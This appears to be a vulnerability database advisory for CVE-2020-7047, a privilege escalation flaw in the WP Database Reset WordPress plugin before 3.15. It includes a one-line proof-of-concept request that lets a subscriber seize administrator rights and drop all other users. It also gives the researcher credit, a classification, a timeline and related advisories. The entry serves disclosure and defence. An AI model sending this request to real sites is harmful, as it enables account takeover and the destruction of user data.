WP Database Reset < 3.15 – Privilege Escalation | CVE 2020-7047 | Plugin Vulnerabilities

Description

This flaw "allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request."

Proof of Concept

Login as a subscriber then send the following request:

URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111

Affects Plugins

wordpress-database-reset

Fixed in 3.15

References

CVE

URL

https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://www.wordfence.com/

Submitter twitter

Verified

No

WPVDB ID

0b76dc5b-a0a9-4c92-9fd8-652245549913

Timeline

Publicly Published

2020-01-16 (about 6 years ago)

Added

2020-01-16 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2020-03-11

Title

MStore API < 2.1.6 - Unauthenticated Arbitrary Account Creation/Edition

Published

2022-07-06

Title

Simple Membership < 4.1.3 - Membership Privilege Escalation

Published

2026-01-16

Title

RegistrationMagic < 6.0.7.2 - Unauthenticated Privilege Escalation via admin_order

Published

2021-04-26

Title

Store Locator Plus < 5.9 - Authenticated Privilege Escalation

Published

2026-02-13

Title

Magic Login Mail or QR Code < 2.06 - Unauthenticated Privilege Escalation via Insecure QR Code File Storage